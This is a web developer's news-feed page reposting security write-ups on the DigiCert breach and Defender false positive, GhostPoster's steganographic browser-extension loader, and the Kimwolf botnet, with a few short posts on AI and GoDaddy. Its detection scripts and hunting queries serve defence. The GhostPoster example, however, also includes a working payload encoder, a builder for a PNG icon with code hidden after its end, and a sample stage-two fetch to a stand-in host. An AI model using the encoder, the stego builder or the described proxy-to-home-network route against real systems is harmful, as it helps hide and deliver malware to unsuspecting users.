Industrial Web Development

The web developers for Cincinnati industrial manufacturers, and for association management / membership management software & websites.

We are web developers for Industrial Manufacturing Companies, Non-Profits, and Associations in the Greater Cincinnati Area.

05/05/2026

Microsoft Defender deleted DigiCert root certificates from Windows machines worldwide and flagged them as Trojan:Win32/Cerdigent.A!dha. Those certificates tell your browser which websites to trust, and tell Windows which software is safe to run. DigiCert was hacked through a screensaver file in a customer support chat, Microsoft tried to respond, and Defender ended up deleting the very thing it was trying to protect.

DigiCert is a certificate authority. A certificate is what tells your browser that a website is real, and what tells Windows that software was actually built by the company whose name is on it. When you see a padlock in your browser, a certificate made that happen. When Windows decides whether to run a program without warning you, it checked a certificate. DigiCert issues more of those certificates than almost anyone else. When you log into your bank, check your email, or install software from a trusted vendor, there is a reasonable chance a DigiCert certificate was involved somewhere in that process.

On April 2, 2026, an attacker contacted DigiCert's support team through a normal customer chat and sent a ZIP file disguised as a screenshot. Inside was a .scr file. That is the Windows screensaver format, the fish-swimming-across-your-monitor format from the 1990s, and a .scr file is nothing more than a renamed executable: Windows runs it exactly like any other program.

The customer support chat made it even easier. According to DigiCert's own incident report, the chat allowed anyone from outside to send files directly to staff members who had access to certificate systems. No restrictions on file type, no sandboxing, no content inspection. The .scr file did not need to be clever. The system just let it through.

This attack has a name: social engineering. The attacker did not write an exploit or find a vulnerability. They posed as a customer, sent a file, and waited for someone to open it. Social engineering has been around longer than most of the security tools built to stop it, and it still works just as well. The most sophisticated security stack in the world ends at the person sitting behind the keyboard.

CrowdStrike and other security software blocked four attempts before the fifth one got through on April 2 and compromised the first machine. DigiCert detected that themselves and contained it by April 3. What they missed was a second machine. On April 4, the attacker used the same delivery method on a second support analyst. Nobody found that second machine until April 14, because the CrowdStrike EDR agent on it was malfunctioning. EDR, Endpoint Detection and Response, software watches a machine for suspicious activity and sends alerts to a central console where a security team can act on them. This agent was running. It just was not sending its alerts anywhere, so from the console the machine looked quiet.

In between, on April 5, an external researcher reported that DigiCert certificates were being used to sign malware in active campaigns. That report is what triggered the deeper investigation that uncovered the second machine.

The attacker left with initialization codes for code-signing certificates.

A code-signing certificate is the digital signature a developer puts on software to prove it came from them and has not been changed since. Windows uses that signature to decide whether to warn you before running something. If the signature checks out, SmartScreen, the part of Windows that screens unfamiliar software, stays quiet and lets it run. Extended Validation certificates, EV certificates, are the top level of that system. You jump through more hoops to get one, and the certificate lists a verified company name. Since March 2024, SmartScreen no longer lets EV-signed software bypass its warnings automatically. But an EV certificate in the name of Lenovo or Kingston still looks very different to a user than an unknown publisher. That is the advantage the attacker was after.

The attacker used the stolen codes to generate EV certificates in the names of real companies: Lenovo, Kingston, Shuttle Inc, and Palit Microsystems. Those certificates were then used to sign Zhong Stealer.

Zhong Stealer has been around since December 2024, when it first showed up targeting people at crypto exchanges and fintech companies. The delivery method back then looked almost identical to how DigiCert got hit: attackers posed as customers, opened support tickets on platforms like Zendesk, and pushed the malware to whoever was handling the ticket. Once on a machine, the malware connects to its Alibaba Cloud server in Hong Kong and downloads a second payload called down.exe. That file disguises itself as a Bitdefender security updater, signed with a stolen certificate so it looks like a legitimate software update. From there Zhong Stealer installs itself and goes to work.

Despite the name, it works more like a remote access tool than a stealer. When it runs, it first checks which languages the system uses, so it skips machines in countries the attackers want to leave alone. It connects to a server in Hong Kong on Alibaba Cloud over port 1311, a non-standard port that is easy to miss unless outbound connections are being watched. It adds itself to the Windows Task Scheduler so it runs again after every reboot. It runs a keylogger alongside a clipboard monitor that records everything copied. For anyone handling crypto wallets or financial accounts, that clipboard monitor is where the real damage happens, because wallet addresses and passwords move through the clipboard constantly.

Security researchers including Squiblydoo, MalwareHunterTeam, and g0njxa connected the stolen certificates to a group tracked under several names. Qi'anxin calls them APT-Q-27. Sophos calls them Dragon Breath. They also go by GoldenEyeDog. The group has been active since at least 2020, targeting online gambling platforms, gaming communities, and the overseas Chinese community. They distribute fake versions of real apps, Telegram, VPN clients, messaging software, all working normally while running malware underneath.

In cybersecurity, attribution is one of the hardest problems to get right. IP addresses can be faked. Tools get shared between groups. Code patterns overlap in ways that mislead researchers. The evidence shows certificates from this campaign signed Zhong Stealer and that the code patterns inside the malware match what researchers have seen from APT-Q-27 before. The IOCs that tie them together are specific enough to hunt for directly:

→ Mutex: `Global\DHGGlobalMutex`
→ Registry key (keylogger): `HKCU\offlinekey\open`
→ Registry key (clipboard monitor): `HKCU\offlinekey\clipboard`

Whether the same group attacked DigiCert's support staff is a question nobody has answered yet.

DigiCert revoked 60 code-signing certificates between April 14 and 17. Twenty-seven were directly tied to the attacker. The other 33 were pulled as a precaution. The IP addresses the attacker used were traced and logged: 82.23.186.8, 154.12.185.32, 45.144.227.12, 203.160.68.2, 154.12.185.30, 62.197.153.45, and 45.144.227.29. DigiCert's own incident report also notes that Zhong Stealer was signed with stolen certificates from other certificate authorities too, not just DigiCert. The campaign was broader than one breach.

Microsoft responded by adding a detection to Defender targeting the stolen certificates. Security Intelligence update 1.449.424.0 shipped April 30, 2026 with a signature called Trojan:Win32/Cerdigent.A!dha. The detection went looking for DigiCert-related entries in the Windows registry, the database Windows uses to store system settings, specifically in the section where trusted certificates live:

HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates

It matched the wrong certificates.

A code-signing certificate belongs to one company and is used to sign that company's software. A root certificate belongs to the certificate authority itself and is the foundation the whole system builds on. When a browser checks whether a website certificate is real, it follows a chain all the way back to a root certificate. Root certificates come pre-installed on every operating system because everything else depends on them being there. The two certificates Defender flagged were DigiCert Assured ID Root CA and DigiCert Trusted Root G4, both sitting in the Windows trust store for years, with thumbprints matching exactly what DigiCert publishes on their own website:

→ DigiCert Assured ID Root CA: `0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43`
→ DigiCert Trusted Root G4: `DDFB16CD4931C973A2037D3FC83A4D7D775D05E4`

Neither had anything to do with the stolen code-signing certificates or Zhong Stealer. Defender removed them anyway.

Without those root certificates, browsers throw errors on sites that use DigiCert-backed certificates, applications that verify software signatures stop working, and corporate systems that use certificate-based logins break. On May 3, 2026, reports started flooding in from admins across Windows 11 and Windows Server environments. Some people, looking at a high-severity Trojan alert marked as remediated, assumed they were infected and reinstalled Windows completely.

To check whether a machine was affected, dump the AuthRoot store and look for the two roots by name:

```
certutil -store AuthRoot | findstr /i /c:"Assured ID Root CA" /c:"Trusted Root G4"
```

If both DigiCert Assured ID Root CA and DigiCert Trusted Root G4 show up in the output, the certificates are there. If they do not, the machine was hit. Do not just search the output for the word digicert: other DigiCert roots live in the same store, and their Issuer and Subject lines would match even with the two affected roots gone. To be certain, compare the Cert Hash(sha1) lines certutil prints against the two thumbprints above.
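A way to make that check by thumbprint across many machines, as an added example that is not from the article, DigiCert or Microsoft: the script below parses the text certutil -store prints and reports which of the two published root thumbprints are absent. On Windows it runs certutil itself; elsewhere it runs against SAMPLE_OUTPUT, a constructed excerpt in certutil's output format in which the Trusted Root G4 entry is missing and a DigiCert Global Root CA entry is present to show why matching on the word digicert alone proves nothing.

```python
import re
import subprocess
import sys

# The two root thumbprints the article lists (SHA-1, as DigiCert publishes them).
EXPECTED_ROOTS = {
    "0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43": "DigiCert Assured ID Root CA",
    "DDFB16CD4931C973A2037D3FC83A4D7D775D05E4": "DigiCert Trusted Root G4",
}

# Constructed excerpt in the format certutil -store prints. Trusted Root G4 is
# deliberately absent, as on a hit machine; the Global Root CA entry is there to
# show why a plain search for "digicert" would still find matches.
SAMPLE_OUTPUT = """AuthRoot "Third-Party Root Certification Authorities"
================ Certificate 0 ================
Issuer: CN=DigiCert Assured ID Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Subject: CN=DigiCert Assured ID Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Cert Hash(sha1): 05 63 b8 63 0d 62 d7 5a bb c8 ab 1e 4b df b5 a8 99 b2 4d 43
================ Certificate 1 ================
Issuer: CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Subject: CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Cert Hash(sha1): a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436
CertUtil: -store command completed successfully.
"""

BLOCK_RE = re.compile(r"^=+ Certificate \d+ =+$", re.M)
HASH_RE = re.compile(r"^Cert Hash\(sha1\):\s*([0-9A-Fa-f ]+)$", re.M)
SUBJECT_RE = re.compile(r"^Subject:\s*(.+?)\s*$", re.M)


def parse_store(text: str) -> dict:
    """Map each certificate's SHA-1 thumbprint (upper-case, no spaces) to its Subject.
    Accepts both the spaced hash format of older certutil builds and the compact one."""
    certs = {}
    for block in BLOCK_RE.split(text)[1:]:
        h = HASH_RE.search(block)
        if not h:
            continue
        s = SUBJECT_RE.search(block)
        certs[h.group(1).replace(" ", "").upper()] = s.group(1) if s else ""
    return certs


def missing_roots(text: str) -> list:
    """Names of the expected DigiCert roots whose thumbprint is not in the dump."""
    present = parse_store(text)
    return [name for tp, name in EXPECTED_ROOTS.items() if tp not in present]


def read_store(store: str = "AuthRoot") -> str:
    """Dump a local-machine certificate store with certutil (Windows only)."""
    proc = subprocess.run(["certutil", "-store", store], capture_output=True,
                          text=True, errors="replace", check=True)
    return proc.stdout


if __name__ == "__main__":
    store = sys.argv[1] if len(sys.argv) > 1 else "AuthRoot"
    dump = read_store(store) if sys.platform == "win32" else SAMPLE_OUTPUT
    gone = missing_roots(dump)
    print(f"{store}: missing {gone}" if gone else f"{store}: both DigiCert roots present")
```

Run it as `python check_roots.py AuthRoot` on a Windows host; pass `Root` instead to check the local-machine Trusted Root Certification Authorities store the same way. A non-empty "missing" list is the signal to push the definition update.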

The fix is updating Defender definitions to Security Intelligence version 1.449.430.0 or later. That version stops the false detection and automatically restores any certificates that were removed. For admins managing larger environments, this Advanced Hunting query lists, per device, when the two root keys were deleted and when they came back. Each certificate in a Windows store is a registry subkey named by its SHA-1 thumbprint, so the query can filter on the two thumbprints directly rather than on every registry key created since May 3:

```
DeviceRegistryEvents
| where Timestamp > datetime(2026-04-30)
| where ActionType in ("RegistryKeyDeleted", "RegistryKeyCreated")
| where RegistryKey contains @"SystemCertificates\AuthRoot\Certificates"
| where RegistryKey has_any ("0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43", "DDFB16CD4931C973A2037D3FC83A4D7D775D05E4")
| project Timestamp, DeviceName, ActionType, RegistryKey, InitiatingProcessFileName
| order by Timestamp desc
```

A device with a RegistryKeyDeleted row for one of the thumbprints but no later RegistryKeyCreated row for the same key has not been restored yet and still needs the definition update.

What this whole chain shows is how far one misconfigured EDR agent and one unfiltered support chat can take an attacker. The entry point was a file people associate with fish swimming across a monitor. The stolen certificates signed malware that had already been running since late 2024. And when Microsoft moved to stop the damage, the fix deleted the very certificates it was trying to protect. Ask yourself what else is sitting undetected right now in places that should have caught it months ago.

Social engineering, credential theft with tools like Mimikatz, and persistence techniques like scheduled tasks and registry keys are all covered step by step in the ethical hacking course:

https://www.udemy.com/course/ethical-hacking-complete-course-zero-to-expert/?couponCode=MAY2026

Hacking is not a hobby but a way of life. 🎯

Read the full breakdown:
https://hackingpassion.com/digicert-breach-defender-cerdigent-false-positive/

Research & writing: Jolanda de Koff | HackingPassion.com
Sharing is fine. Copying without credit is not.

04/28/2026

I learned to not trust computers, operating systems, software, plugins, online services, or phones to not royally mess things up decades before “AI”. The amount of people putting their lives, jobs, and companies in its hands is crazy. ⬇️⬇️⬇️

04/27/2026

"Our large-scale experiment with 19 LLMs reveals that current models degrade documents during delegation: even frontier models (Gemini 3.1 Pro, Claude 4.6 Opus, GPT 5.4) corrupt an average of 25% of document content by the end of long workflows, with other models failing more severely. Additional experiments reveal that agentic tool use does not improve performance on DELEGATE-52, and that degradation severity is exacerbated by document size, length of interaction, or presence of distractor files. Our analysis shows that current LLMs are unreliable delegates: they introduce sparse but severe errors that silently corrupt documents, compounding over long interaction." 👇👇👇

03/13/2026

An additional issue is that in training, models were rewarded more points for giving a confident answer. They received no points for saying "I do not know" or for asking for more information. The end result is an "intelligence" rewarded for guessing, lying, and being confidently wrong. Letting it write a tech paper or your ad content is hazardous, expecting it to be on-brand with your visual ads is crazy talk right now, and thinking it will make a good customer service agent is self-sabotage, but letting it give you life advice or become your best friend is sheer lunacy.

03/13/2026

Asus routers and IoT devices ('smart' fridges, thermostats, light bulbs, etc.) are a huge risk to security. Even if it is worth it at home to know what is in the fridge from miles away or to not have to walk to the thermostat, these things are not good for any workplace.

Victims of the KadNap botnet are spread throughout the world

02/17/2026

Absolutely do not ever click these. The Social Security Administration is never going to email you statements.

For further information please re-read this posting.

02/11/2026

Trying to admin DNS records and payment methods on a domain at GoDaddy and clicking "manage" forced me onto this Airo page that tried designing some junk AI BS garbage website for me. That would have been annoying enough but it also created a website 'product'.... and... it even pointed my DNS records to the crapsite I never asked for and created a lot of DNS entries for a payment system, even signed me up for one... all from clicking one button expecting things to work the way they always had in the past, not expecting to be hijacked by a junk website builder.

Anyway... Beware GoDaddy users when trying to do anything with your domains. I moved 99% of domains and hosting away from them a while ago, but was slower moving on my personal domains and sites.

Fix: Specifically click "DNS" instead of "Manage", then onboard the domain into Cloudflare and change the nameservers to your Cloudflare nameservers. From there you can unlock the domain, click "transfer to another registrar", and save that code. Wait until the domain shows up in your Cloudflare panel under "Transfer Domains", but keep checking dcc.godaddy.com/control/transfers for an opportunity to release the domain right away - within about an hour or less you'll be able to transfer the domains to Cloudflare and only pay the $9.99 a year registration fees from there out, instead of GoDaddy's $21 a year with every basic service being an add-on for $$$$. Yep, you get registration privacy, DNSSEC, and a lot of other bells and whistles for free from Cloudflare.

02/08/2026

We’re not yet where any of this is reliable. Personally, when I have nothing but AI chatbots for support, I turn to another company. Customers don’t appreciate it and worse, it seems a liability.

01/19/2026

Undetected for years.

Your browser extension logo just became malware. Not the code. The actual image file. A PNG icon sitting in your toolbar, looking normal, hiding JavaScript that takes over your browser. Over 1 million victims through GhostPoster. Part of a larger operation hitting 8.8 million. Seven years undetected. 🧐

Last week, researchers revealed the full scope of a campaign they call GhostPoster. Koi Security published the first findings in December 2025. LayerX followed up with additional discoveries on January 15, 2026. And it is worse than anyone thought.

The trick is simple but brilliant. Every browser extension has a logo. A tiny image people glance at and never think about. The attackers hid malicious code inside the PNG file, right after where the image data ends. The browser shows the icon normally. Security scanners see a valid image. But the extension reads its own logo, searches through the raw bytes for a marker, and runs whatever comes after.

The marker is three equals signs: ===

Some variants use four greater-than signs: >>>>

Everything after that marker is not image data. It is JavaScript waiting to run.

This is steganography. Hiding data inside something that looks innocent. Code reviewers checking the extension's JavaScript files find nothing. Automated scanners see nothing wrong. The malware lives inside an image that looks perfectly normal in the toolbar.

But they did not stop there.

The code in the logo is not the actual malware. It is just a loader. A small program that grabs the real payload from command servers. Primary server: liveupdt[.]com. Backup: dealctr[.]com.

The loader does not call home right away. It waits 48 hours. Even then, it only grabs the payload 10 percent of the time. Researchers watching network traffic might see nothing suspicious for days. The malware is patient. Inconsistent behavior is harder to catch.

When the payload finally arrives, it goes through custom encoding. Letters swap between uppercase and lowercase. Numbers 8 and 9 get exchanged. Then Base64 decoding. Then XOR encryption using a key from the extension's runtime ID. The result gets stored in browser storage. Persistence achieved.
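To make the two tricks above concrete, here is an added example written for this page, not GhostPoster's own code. It does two things: it walks a PNG chunk by chunk and reports anything appended after the IEND chunk, together with the === or >>>> marker the loader scans for, and it implements the decode chain described above (case swap, 8 and 9 swapped, Base64, XOR with the extension's runtime ID) along with its inverse so a sample icon can be built and scanned offline. The runtime ID, the payload text and the 1x1 PNG are all constructed.

```python
import base64
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
MARKERS = (b"===", b">>>>")   # the markers the article says the loader searches for


def png_end_offset(data: bytes) -> int:
    """Offset just past the IEND chunk, or -1 if data is not a well-formed PNG."""
    if not data.startswith(PNG_SIGNATURE):
        return -1
    off = len(PNG_SIGNATURE)
    while off + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[off:off + 8])
        off += 12 + length          # 4 length + 4 type + data + 4 CRC
        if ctype == b"IEND":
            return off
    return -1


def find_trailing_payload(data: bytes):
    """None for a clean PNG; otherwise what sits after IEND and which marker, if any."""
    end = png_end_offset(data)
    if end < 0 or end >= len(data):
        return None
    tail = data[end:]
    for marker in MARKERS:
        idx = tail.find(marker)
        if idx >= 0:
            return {"marker": marker.decode(), "trailing_bytes": len(tail),
                    "payload": tail[idx + len(marker):].decode("latin-1")}
    return {"marker": None, "trailing_bytes": len(tail), "payload": None}


def _swap_89(s: str) -> str:
    return s.translate(str.maketrans("89", "98"))


def _xor(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_payload(encoded: str, runtime_id: str) -> str:
    """Undo the loader's encoding in the order the article lists the steps."""
    b64 = _swap_89(encoded.swapcase())
    return _xor(base64.b64decode(b64), runtime_id.encode()).decode()


def encode_payload(plain: str, runtime_id: str) -> str:
    """Inverse of decode_payload; the case and 8/9 swaps are their own inverses."""
    b64 = base64.b64encode(_xor(plain.encode(), runtime_id.encode())).decode()
    return _swap_89(b64).swapcase()


def _chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def build_icon(trailer: bytes = b"") -> bytes:
    """A valid 1x1 RGB PNG (constructed), optionally with bytes appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # width, height, depth, RGB
    idat = zlib.compress(b"\x00\x00\x00\x00")             # filter byte + one black pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"") + trailer


# Constructed values: Chrome runtime IDs are 32 letters a-p; the payload is a stub.
SAMPLE_RUNTIME_ID = "abcdefghijklmnopabcdefghijklmnop"
SAMPLE_PAYLOAD = "fetch('https://example.invalid/stage2')"


def scan_sample() -> str:
    """Build a stego icon, scan it, and return what the loader would execute."""
    icon = build_icon(b"===" + encode_payload(SAMPLE_PAYLOAD, SAMPLE_RUNTIME_ID).encode())
    hit = find_trailing_payload(icon)
    return decode_payload(hit["payload"], SAMPLE_RUNTIME_ID) if hit and hit["payload"] else None


if __name__ == "__main__":
    print("clean icon:", find_trailing_payload(build_icon()))
    print("stego icon decodes to:", scan_sample())
```

Pointed at an unpacked extension directory, find_trailing_payload on every .png is a cheap triage check: an icon that is a valid image and still has bytes after IEND deserves a look, marker or not.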

What does the malware actually do?

It strips security headers from every website visited. Content-Security-Policy, gone. X-Frame-Options, gone. These headers protect against clickjacking and XSS attacks. The extension removes them silently on every page.

It injects Google Analytics tracking everywhere. Tracking ID: UA-60144933-8. It logs the extension installation date, how many days the victim has been infected, which shopping sites are visited, and a unique browser ID. Hidden div elements show up in pages with IDs like extwaigglbit and extwaiokist. Tracking data that scripts can read.

It hijacks affiliate links on Taobao[.]com and JD[.]com. Someone clicks a product link. The extension swaps it. The original affiliate gets nothing. The attackers get paid. The victim still ends up on the same product page. Still buys. The only difference is who earns the commission.

It injects invisible iframes that load attacker-controlled URLs for ad fraud, click fraud, and extra tracking. The iframes appear, do their job, and vanish after 15 seconds.

It bypasses CAPTCHA. One method fakes user interaction. Another loads an external solver. The malware needs to look human to keep running.

The campaign started on Microsoft Edge back in 2020. Then it spread to Firefox and Chrome. The extensions look useful.

→ Free VPN Forever with 16,000 installs
→ Google Translate in Right Click with 522,398 installs
→ Translate Selected Text with Google with 159,645 installs
→ Ads Block Ultimate with 48,078 installs
→ Floating Player PiP Mode with 40,824 installs

On Opera, a fake Google Translate extension by developer "charliesmithbons" reached nearly one million installs. Same infrastructure. Same malicious behavior. Still communicating with mitarchive[.]info and gmzdaily[.]com.

Free VPNs, translation tools, ad blockers, weather apps, and screenshot utilities. The categories people trust most.

But GhostPoster is not alone.

Researchers traced the infrastructure and found connections to two other campaigns. Same group. They call the threat actor DarkSpectre.

ShadyPanda hit 5.6 million users through Chrome and Edge. These extensions ran clean for three to five years. They earned Featured and Verified badges. Built trust. Then one update weaponized everything. One extension called WeTab, 3 million installs, tracks every URL visited, every search query at keystroke level, every mouse click with pixel coordinates, browser fingerprints, and page interactions. It sends everything to 17 domains including Baidu servers in China.

The Zoom Stealer hit 2.2 million users through extensions that access 28 video platforms including Zoom, Microsoft Teams, Google Meet, Cisco WebEx, and GoToWebinar. These extensions scraped meeting URLs with passwords, participant lists, speaker names, titles, bios, photos, and company info. They stream meeting data in real time over WebSocket connections. Not consumer fraud. Corporate espionage.

Combined: 8.8 million victims over seven years.

There are still 85 or more sleeper extensions sitting in browser stores right now. They look legitimate because they are legitimate. For now. They are building trust, collecting users, earning badges. Waiting.

Researchers found signs pointing to China. Command servers on Alibaba Cloud. ICP registrations in Hubei Province. Chinese comments in the code. Development activity matching Chinese timezone patterns. Affiliate fraud targeting Chinese e-commerce platforms.

But here is the thing about attribution. In cybersecurity, attribution is one of the hardest problems. IP addresses can be spoofed. Tools can be shared. Languages in code can be faked. What we know for sure is how the malware works. Not necessarily who is behind it. This is my opinion.

Mozilla and Microsoft removed the extensions after disclosure. Google confirmed removal too. But store takedowns only stop new downloads. Extensions already installed keep running. The malware is still active on devices right now.

How to protect yourself.

→ Check your installed extensions in Chrome, Edge, and Firefox
→ Remove any VPN, translator, or ad blocker you do not recognize
→ Check chrome://extensions or about:addons for anything suspicious
→ Watch for high CPU usage or strange network traffic from your browser

Fewer extensions, smaller attack surface. That simple.

The extensions that promised privacy delivered surveillance. The icons that looked trustworthy hid code. And the gap between what security tools see and what actually runs is exactly where GhostPoster lives.

GhostPoster hid malware using steganography. I teach this technique and many more, from traffic analysis to reconnaissance to exploitation, in my ethical hacking course. Understanding how attackers think is the first step to stopping them:

https://www.udemy.com/course/ethical-hacking-complete-course-zero-to-expert/?couponCode=FEBRUARY26

(The link supports me directly as the instructor!)

Hacking is not a hobby but a way of life. 🎯

Article:
https://hackingpassion.com/ghostposter-malware-browser-extension-png-steganography/



Research & writing: Jolanda de Koff | HackingPassion.com
Sharing is fine. Copying without credit is not.

01/05/2026

A botnet just fired 1.7 billion DDoS commands in 72 hours. Attack capacity: nearly 30 Terabits per second. 2 million Android TV boxes sitting in living rooms across 222 countries and regions. And now we know how the attackers built it so fast. 🧐

The attackers didn't send phishing emails. They didn't trick anyone into downloading malware. They just bought access to a proxy service and walked right into home networks.

A few weeks ago, I wrote about Kimwolf and how massive this botnet has become. But researchers just revealed something even more disturbing: how they did it.

Between November 19 and 22, the botnet went crazy. It fired 1.7 billion DDoS attack commands in just three days, spraying attacks across the entire internet. Its control server briefly became the most visited domain on earth, surpassing Google in Cloudflare's global rankings. Researchers estimate its attack capacity at nearly 30 Terabits per second, and believe Kimwolf was behind the record-breaking 29.7 Tbps DDoS attack earlier this year.

Researchers found that 96% of the botnet's commands are for proxy services. The operators route criminal traffic through infected living room devices, and with 2 million endpoints, they're estimated to earn around $88,000 per month just from selling bandwidth.

Here's how it works.

Millions of phones and tablets run proxy apps, free VPNs, and cheap apps that promise something for nothing. What they actually do is turn the device into a relay. Other people pay to route their traffic through it, and the home IP address goes up for rent.

Normally, proxy services block access to local network addresses like 192.168.1.1, the router, and other devices in the house.

But researchers found a hole. Attackers registered domains that resolved to local addresses. The proxy service checked only the hostname, looked it up, got a private address back that it never checked, and forwarded the request straight into the home network.

Once inside, they scanned for targets. And they found plenty.

Android TV boxes ship with a feature called Android Debug Bridge enabled and listening on the network (TCP port 5555 by default). ADB is meant for factory testing. It gives full control over the device: read memory, write files, install software. No password required.

These boxes are sold everywhere, on Amazon, Walmart, and AliExpress. They cost anywhere from $40 to $400. They promise free streaming. What they deliver is a wide open door into the home network.

The attackers used the proxy tunnel to reach these devices. One command gave them full access, the malware was installed, and the device joined the botnet.
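What the proxy's exit check should have done, as an added example in Python that is neither IPIDEA's code nor the researchers': refuse any destination whose resolved addresses include a private, loopback, link-local or IPv4-mapped address, and connect to the address that was checked rather than resolving the name a second time. FAKE_DNS is a constructed stand-in for DNS so the example runs offline; the hostnames and addresses in it are made up.

```python
import ipaddress
import socket

# Constructed stand-in for DNS. The names are made up; the pattern is the one the
# article describes: a harmless-looking hostname that resolves to an address
# inside the victim's home network.
FAKE_DNS = {
    "cdn.example.net": ["93.184.216.34"],                        # ordinary public host
    "router.evil-proxy.example": ["192.168.1.1"],                # points at the home router
    "tvbox.evil-proxy.example": ["93.184.216.34", "10.0.0.23"],  # public first, private second
    "mapped.evil-proxy.example": ["::ffff:192.168.1.50"],        # IPv4-mapped IPv6 disguise
}

CGNAT = ipaddress.ip_network("100.64.0.0/10")   # not flagged by is_private on older Pythons


def resolve(host: str, resolver=FAKE_DNS) -> list:
    """All addresses for host. Pass resolver=None to use the real DNS."""
    if resolver is not None:
        return list(resolver.get(host, []))
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def is_internal(addr: str) -> bool:
    """True for any address a proxy exit must never forward traffic to."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped   # ::ffff:192.168.1.50 is still 192.168.1.50
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified
            or ip in CGNAT)


def allowed_exit_target(host: str, resolver=FAKE_DNS) -> tuple:
    """Decide whether the exit may connect to host.
    Returns (ok, address_to_connect_to, reason)."""
    try:
        addrs = [str(ipaddress.ip_address(host.strip("[]")))]   # literal IP: no lookup
    except ValueError:
        addrs = resolve(host, resolver)
    if not addrs:
        return (False, None, f"{host}: no address")
    for a in addrs:
        if is_internal(a):
            # One internal answer poisons the whole set: a mixed answer is the
            # attacker hedging, not a misconfigured CDN.
            return (False, None, f"{host} resolves to internal address {a}")
    # Hand back the address that was checked. The caller must connect to it and
    # not resolve the name again: a second lookup lets the attacker answer with a
    # public address for the check and a private one for the connection.
    return (True, addrs[0], "ok")


if __name__ == "__main__":
    for name in FAKE_DNS:
        print(name, "->", allowed_exit_target(name))
    print("127.0.0.1 ->", allowed_exit_target("127.0.0.1"))
```

The same rule applies to any server-side fetch of a user-supplied URL, which is why this is the standard SSRF defence as well; the proxy case is just that defence applied at the exit node.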

Infected models include:
→ SuperBOX
→ X96Q
→ MX10
→ TV BOX
→ SmartTV
→ Various no-name Android boxes
→ Digital photo frames with the Uhale app

The proxy service exploited was IPIDEA, based in China. They claim 100 million endpoints. Researchers found two-thirds of their Android devices had no authentication at all.

IPIDEA patched the hole after researchers reported it. But by then, 2 million devices were already compromised.

The botnet uses DNS-over-TLS to hide its communication from traditional security tools. It obfuscates command server addresses with XOR, so even intercepted traffic shows the wrong destination. When researchers took down its servers, the operators switched to blockchain. They now store their real server addresses on Ethereum Name Service domains that are far harder to seize or block.

After one takedown attempt, the Kimwolf operators responded: "we have 100s of servers keep trying LOL!"

They weren't bluffing. They rebuilt from almost nothing to 2 million bots in days, just by exploiting the proxy vulnerability.

Think about this scenario. A friend visits, connects to the WiFi, and their phone has some free VPN installed. That phone is now a proxy node. The home IP address appears on a proxy marketplace, attackers tunnel through, find the Android TV box, and infect it. The friend leaves, but the infection stays.

Proxy apps punch holes, cheap devices have no security, and the combination is a disaster.

Signs a device might be infected:
→ High network traffic for no reason
→ Device running hot when idle
→ Slower internet than usual
→ Strange outbound connections

Synthient built a page to check if an IP address was seen in Kimwolf traffic:
https://synthient.com/check

If a TV box matches one of these infected models, disconnect it. Not worth the risk.

This attack shows exactly why understanding home network security matters. I cover network fundamentals, how attackers find and exploit devices, and how traffic flows through systems in my ethical hacking course:
https://www.udemy.com/course/ethical-hacking-complete-course-zero-to-expert/?couponCode=FEBRUARY26

(The link supports me directly as the instructor!)

Hacking is not a hobby but a way of life. 🎯



Research & writing: Jolanda de Koff | HackingPassion.com
Sharing is fine. Copying without credit is not.

Address

11223 Cornell Park Drive
Blue Ash, OH
45242

Opening Hours

Monday 9am - 5:30pm
Tuesday 9am - 5:30pm
Wednesday 9am - 5:30pm
Thursday 9am - 5:30pm
Friday 9am - 5:30pm

Telephone

+15134638787
